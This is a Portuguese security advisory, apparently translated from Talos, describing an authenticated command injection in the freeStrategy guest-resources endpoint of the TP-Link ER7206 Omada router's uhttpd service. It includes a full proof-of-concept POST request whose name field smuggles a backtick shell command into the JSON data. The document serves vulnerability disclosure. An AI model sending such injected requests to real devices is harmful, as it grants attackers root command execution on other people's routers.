
Vulnerabilidade de injeção de comando no TP-Link ER7206 Omada Gigabit VPN Router uhttpd freeStrategy
TP-Link ER7206 Omada Gigabit VPN Router uhttpd freeStrategy Vulnerabilidade de Injeção de Comando
Existe uma vulnerabilidade de execução de comandos na funcionalidade de recursos de convidado do Roteador VPN Gigabit Tp-Link ER7206 Omada 1.3.0 build 20230322 Rel.70591. Uma solicitação HTTP especialmente criada pode levar à execução arbitrária de comandos. Um atacante pode enviar uma solicitação HTTP autenticada para acionar esta vulnerabilidade.
As versões abaixo foram testadas ou verificadas como vulneráveis pela Talos ou confirmadas como vulneráveis pelo fornecedor.
Tp-Link ER7206 Omada Gigabit VPN Router 1.3.0 build 20230322 Rel.70591
ER7206 Omada Gigabit VPN Router - https://www.tp-link.com/us/business-networking/vpn-router/er7206/
O Roteador VPN Gigabit ER7206 Omada é uma solução de rede de alto desempenho que suporta conectividade gigabit, VPN altamente segura e integração com o Omada SDN para gerenciamento centralizado em nuvem e provisionamento zero-touch.
O Roteador VPN Gigabit ER7206 Omada executa vários serviços para gerenciar o roteador ou dispositivos conectados a ele. Um desses serviços é o uhttpd, que opera nas portas 80/443. Ele fornece aos usuários uma interface web para configurar e gerenciar o roteador. Por padrão, o serviço é executado como usuário root. Um atacante pode obter acesso root ao dispositivo explorando este serviço.
Existe uma vulnerabilidade de injeção de comando no serviço uhttpd quando um recurso de convidado é adicionado ao dispositivo. Na interface web, a página de recursos de convidado pode ser acessada navegando para Autenticação -> Configurações de Autenticação -> Recursos de Convidado. Ela contém recursos para adicionar, editar e excluir recursos de convidado. Quando um recurso de convidado é adicionado, ele aciona a seguinte solicitação HTTP Post:
POST /cgi-bin/luci/;stok=b53d9dc12fe8aa66f4fdc273e6eaa534/admin/freeStrategy?form=strategy_list HTTP/1.1
Host: 192.168.8.100
User-Agent: python-requests/2.31.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Cookie: sysauth=8701fa9dc1908978bc804e7d08931706
Content-Length: 470
data=%7B%22method%22%3A%22add%22%2C%22params%22%3A%7B%22index%22%3A0%2C%22old%22%3A%22add%22%2C%22new%22%3A%7B%22name%22%3A%22DDDDL|`/usr/bin/id>/tmp/had`%22%2C%22strategy_type%22%3A%22five_tuple%22%2C%22src_ipset%22%3A%22%2F%22%2C%22dst_ipset%22%3A%22%2F%22%2C%22mac%22%3A%22%22%2C%22sport%22%3A%22-%22%2C%22dport%22%3A%22-%22%2C%22service_type%22%3A%22TCP%22%2C%22zone%22%3A%22LAN1%22%2C%22comment%22%3A%22%22%2C%22enable%22%3A%22on%22%7D%2C%22key%22%3A%22add%22%7D%7D